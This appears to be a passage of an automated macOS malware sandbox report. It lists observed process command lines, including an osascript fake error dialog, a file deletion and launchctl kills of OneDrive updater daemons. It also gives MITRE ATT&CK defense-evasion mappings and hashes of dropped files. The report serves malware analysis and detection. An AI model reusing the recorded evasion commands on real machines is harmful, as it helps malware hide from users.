/usr/bin/osascriptosascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=117"1⤵
-
/bin/rmrm -f /usr/local/Homebrew/.git/TMP_FETCH_FAILURES1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=117"1⤵
-
/bin/launchctl/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon1⤵
-
/bin/launchctl/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=117"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=30" "--launch-time-ticks=478946604" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=71"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=31" "--launch-time-ticks=482801269" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=71"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=116"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=71"1⤵
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Resource Forking
1Indicator Removal
1File Deletion
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD506070a65508302fe62e21b77bd9e3c7b
SHA17e9b6f6d763ea0cad9cab95aca686f5c46c653c0
SHA256ab19e99b1c6dbdcf789ea7e5a353ad03ebd969792d674074670da7c7767e2f85
SHA512ed2baa67e5bc3c429815ffd208a9b6849bf9f4fd89471361d6df5faba6d294fbabd431177d2aacce4f636d7dc959e9cd1253f2a5d86799ec953a08e01f4773de
-
Filesize
31.5MB
MD5f092a6cdaf515b4ca46378d07addedde
SHA1503ddc2ec47d9df7c3d6d2bdc9778e37f861e5ea
SHA2562074e1c7498d6661349171622ceece33974a1b5a35109f11e169fb1736527422
SHA5126722135a98f691e9a92cbac383a521af991255620610834439407d9b05d9da90308feeda932611e360d0d66944ffe5265e8c554a08f647b1fa956c4b70670093
-
Filesize
28.9MB
MD5ef95c6b9b1feb793e19137e090f78703
SHA14fc922547bb6997de0ccc2fafbb1e01186f17da1
SHA2566fe092bb2d88e13cb8b9b5ee71a07a31ba210142ec9a041b32e57e41b17d5935
SHA51220b214eacc13faf6a09740d7301606c902e24a8d10c40423595ba5b8e8c68a887e80dcfada55d204e131125b1ddb53826e13245deaeafb1e423f9dd77aa03f10
-
Filesize
90KB
MD54e9060f76c1cb5b54005dc6640a58f0d
SHA104a1e6791ae55612d9b63f23ccb37eec398b3d27
SHA2565b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3
SHA512be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148
-
Filesize
20KB
MD52a3fa78b5f55b529a2698ad187c80204
SHA1cbbda35512038de511ac23b0aed12e9e86bcc796
SHA256d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b
SHA512e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab
-
Filesize
40KB
MD5b6914d8e5cb470236eceed8d6f8b4fb7
SHA1cdff8880e9fa7630fc8d57af4669365b5ab29b60
SHA25645bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1
SHA5121c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7
-
Filesize
1KB
MD531717a21202f4dbab34a72c86ae4f3f2
SHA178fab4a3136000513a8f66f2d81d19cb2473338d
SHA2566e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da
SHA5124c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c
-
Filesize
104KB
MD517b016b2f7bc845b00cb36bb30a6cb5d
SHA12be7ff55dc9033d3a90e98821d80f8596a9dff4a
SHA256fe2d0e216436831f0801c04d7513c8dd01feeece44b4ba87a1e1e9c24efaa5b3
SHA512f1c1cf3fbb2cc635bfded0c311be1761dfcdf1eb528d8f11c63035fc713e54d7ecae9025fa38864a881b73faffc9efd66486f107f77b9098f4870dbec0e17530
-
Filesize
4B
MD563a9f0ea7bb98050796b649e85481845
SHA1dc76e9f0c0006e8f919e0c515c66dbba3982f785
SHA2564813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
SHA51299adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8
-
Filesize
518KB
MD55e615b6e83319013374555ae6b92b39d
SHA105ddb08149e775cf20d26de1d2fcdb9efd3ec237
SHA25642c7d9ccad111e8fe8b944d3124fd5f0b3f55a3c3e17ff7f39f2c747a9badf43
SHA5123f63f317179bfcbd1a88b16d6217cce8cf7499389ee2d622e405a006a6743344a8687e2a03e02b2396a7d1f7628486cec4645eba383a62d404538cb64079771c
-
Filesize
3KB
MD530899b6c4e4a757b8ec6dd2208acdfb4
SHA1f2c5880a724c6d75cce1b5191e0d82c3bc7de768
SHA2564f17efbd974a41d88cb36567aab6bf4586579e78780f00b1826676819e14bff4
SHA51258539e3f0ad7fef30792efcdbbd955599e11e4261c9946e7c3dff6267e01747354ea3b901c46fc8329f81c68afbeb2d05fe3fcb266bc5948de8befa5b8d040ee
-
Filesize
531B
MD5344554d96e418120bd80ef5de5194697
SHA123e141c3a6ce368acc1c299f062ab85914bcb17e
SHA2560a4bd08db6422f8e7a8a218ef39c1b99a5a675f12697f26be88f9afc2e1f9378
SHA5127ae38853e5acca479d7fd81d48bb88c671cf4dce63342209bcff045ac581a04b7b0ed48f6c58253db950935c0522caaa4fbc6cf5a25151a8960ba56fc804569e
-
Filesize
531KB
MD56eebed29e6a6301e92a9b8b347807f5f
SHA165dfb69b650560551110b33dcba50b25e5b876de
SHA25604cd9494b0ed83924dad12202630b20d053d9e2819c8e826a386c814cc0a1697
SHA512fede6db31f2ad242e7bc7b52a8859ba7f466a0b920a8dadcb32dcfb5b2a2742e98b767ff22e0c5bc5c11fec021240aa9e458486c9039eb4ebe5cf6af7be97bf2
-
Filesize
242KB
MD5541f52e24fe1ef9f8e12377a6ccae0c0
SHA1189898bb2dcae7d5a6057bc2d98b8b450afaebb6
SHA25681e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82
SHA512d779d78a15c5efca51ebd6b96a7ccb6d718741bdf7d9a37f53b2eb4b98aa1a78bc4cfa57d6e763aab97276c8f9088940ac0476690d4d46023ff4bf52f3326c88
-
Filesize
3KB
MD539fbc1bf4c6c8f919181e3e72630f974
SHA1b73f2394a2c1ac341df75ba63eef4e5e9830fade
SHA2563a118962ef814c91f6476bb9f0de58afa63103af6ac1b8729be9b39a86789e96
SHA5122dbd8f772bc113f6500dace5d187b12c79e6e3a5c7f6f68d270beebc482334a1970499b28de5187a3619ff3ecd20aab10c31df8433d509dc011e1e88978ab70e
-
Filesize
5KB
MD5f5ed8ad664370de2d16265ac99085dbc
SHA152deeff97bc4c2777b70b7d79bedeae161183150
SHA2569fe1922c50cef6ab1c62d9b37a37e0a7d6e82639217b4b7fb1537183ae0dbf55
SHA512d0ee804f80dbb6a6a9a5e6165829f840761526782933997b73e22fcda452be6a2b4025c51e22c7980d5a49b985d26b70a2d1f4e5d40f5863712103c1c50e67c7
-
Filesize
25KB
MD541c1925b7cf736f0252a27453fe22713
SHA1ec2d5b146a5b5a9407c20cf816aef0e1f15a5dc8
SHA256556b5e5dd57c828f2d08e5269e898cdfb6c957f8bd39e96a13a1bd4d792b6660
SHA51203e39b240da9724f0d286364aeaa92e35ef87308442032c1d1388aa74a657fc573ad7f58b728e59c19b0eff93ce5e23be44f7af6a49c11a3d617f64bddb555ac
-
Filesize
34KB
MD52db7e78c310ca8e73c069a604eac4d99
SHA1a6d1e03514f8eba03ab81f1380fc54aaded823b6
SHA256cd1978742a4afdbaaa15bf712d5c90bef4144caa99024df98f6a9ad58043ae85
SHA512681eaddbf304f4513b008b98493272b44815460568876b93528851ff7806775de38e6ec588fe27a2cf3dc804415e83a420e45d754b25ad4bdf68ef2c78403aa3
-
Filesize
70KB
MD5b173dbd5ca315b732be8248161124804
SHA10083e57ea026113275009cb9cd111bd211578e17
SHA256888ebbd183d017421d0f23a0a1ea9eaedffefd772878d86c67536c138ef62ada
SHA512d4cb2a881e157a6d71fd5afc0c1fe0cb343de0ff019ab8778bfcbcd731a2fb8e28336986c603a3e354d9889e2adb68ba6a40fe7df0cc1fa5832bc000ef1624e5
-
Filesize
47KB
MD5556134b3869539491e28c6eecb84cbe4
SHA119e9ebc5a6778a01dd75fad5738a20ecfeca08ab
SHA2563e6a99367b6b37be5ad828dac3f4612241ac241264ca3955b108ff8b9333b5d3
SHA512c2cf30bef68fb6077dd30f7c66afac49a7efabc39330c5c33f7c29a5abdbfa5c2253d94a506168de95aaea7b9df7b28cc6854626347a5991b159b59b7e8811f7
-
Filesize
5KB
MD5636c653ec2c30bb767533901a18669b2
SHA14b5a01cfea4c5deb62f3aafa01ef24265613b844
SHA2563eb16d6c28b502ac4cfee8f4a148df05f4d93229fa36a71db8b08d06329ff18a
SHA512a4128fb20a5df9e573e92b45f5bc18dcdf4be6e7e39172d08847882f17361320141e89b35deef337e40c365d6f1ccdd1b991eb4593d805dfa2e39a5257c335ee
-
Filesize
40B
MD5c6db1caaee0095f017c09113d53ed054
SHA1cc37e2b3948325a0eeb51080f45b17ebf52a7035
SHA256ca3252b297284a87de2ee1688585f7c37d26b98c05d7ed04bd7d6df10c0d1476
SHA5123013340ee4157dfef7dcacd690b840f12b876e8241d4e8bc419016d5336810ab77023cdbbeaa896544e4c29f386d21296649542ef2b0fc6b58c49e2ad0337d85
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
141B
MD538fc535a8f11d7e955ef58cc63158eff
SHA1c45ad3ee106dbfb65dce7c09b53140f34454cd0e
SHA256085c44dfa11e65ac3548c4d0fe1ae641570f90c7caaa2881c3990efcf555e6a8
SHA51226e70000f77c1b6388dd470f9d7ec6bedc4fc3c43e48efcc853812eb076108bcdd9f50f7a89265e431d33df96e71755ca242dfd0aac16a51d99dea50a5a1e505
-
Filesize
312B
MD55c4e7ade5753ab7de2c42c04111fa42e
SHA1fb577b8c07d9617f507a3f2950df0a6dcfebe4e2
SHA256d3979fd2d9ecfdb05498d79d1f24998c38cfd107e321f6810d8b7f9f12affd82
SHA5127a7452bcd22e66190e36ff0036f21d854fa57bdcbaebf637aa3a6d932a385a7c90525ede0c124853c218445d583c0edcf45d12159ca452732f31d16c3901929b
-
Filesize
136B
MD5fe382e791274914bee5950777e4f1fd3
SHA153b523b5fc87e66f2520a0b5f9ea080072668f4d
SHA256935d36c021d0e08a5648c622f3f6fde376e3310013680ae598c0e22dc943d132
SHA512a5f608fb4f0a1dbc4c5d1b739b1a5b6f50cac1d6a61312b19abf9f601882a291d73524ac55bbe183e4e64db8dcc203d4bf3cedc734fd04bd448cb825d98d1e67
-
Filesize
337B
MD5ea517aa120c972c602673d331dfa35bc
SHA17ff539eec544cf306b80137bc182fb544e58aad5
SHA2560c53b2ef8ec9bd6c3b81955b45cd9fc69705e7b435ad747b50c150c7e341f8da
SHA512e2bc6f26b0db61af3b7f1648e890be2b748aa886ff3ab51e207a915432c6d9a426b188fe9c979b443e8fe8aad248442b20b2e6cd38f494264cb7cdbcaa88eecd
-
Filesize
353B
MD517a2dc5826aeb539547f00f52eccccd5
SHA1fd36ad6db84312792cffac0267f6329b21727d66
SHA256746da9cf33c3e4d29907dfdf1065f06ae16dcb5c2e9a34cfb5dd0dae9130f151
SHA5126bca3e308d0446211570021c1f1dc6d8e9704a2a68a90c5c8daf26b20cb2702bccfae8ddfeb6f16c8bfea83e1b648810054a25a7967bb9539feb241f2950ea73
-
Filesize
382KB
MD56d7c2f9e94664539dec99b3233301b01
SHA185812b004742cc1c211c92911131ce270f8ba769
SHA256a0956386dc64fd9f4883c8741f950cd60a56859616b159c9e4251c9eb0ac5534
SHA5124d06917f30651c3bf13c509aae79793b3f1ec93de12179464b18fd9fd16c7bf466884b1c70e425d7e937adde341cf24bd08f19a132bbb9683e804f29b4ed0c33
-
Filesize
120KB
MD5c5e30274fe7b93847f6d7c02410d1209
SHA1488a49f38459f29e110c706c51b61ca1ae3b0e26
SHA256e634e3cfdd0d27d0be1f5f9a19748d19d564928765db343503f42a6e1f5dd4ea
SHA512bc235bb3af269e9a828e6788dbae2b42cabc879b858102f4cc76c0fa02af0e296d20ffc8f134c0a3f9b408643e4810e8c46afeb0c285b892908b06ea1aa1b811
-
Filesize
68KB
MD56274a7426421914c19502cbe0fe28ca0
SHA1e4d1c702ca1b5497a3abcdd9495a5d0758f19ffc
SHA256ae2fd01d2908591e0f39343a5b4a78baa8e7d6cac9d78ba79c502fe0a15ce3ee
SHA512bf1287f502013308cdd906f6e42998c422ef1e272b348e66122dc4a4e471d01333b418f48d1bb2198c72845bdc950612597e179e612aaa1ba6cf8d48fb8f0cf5
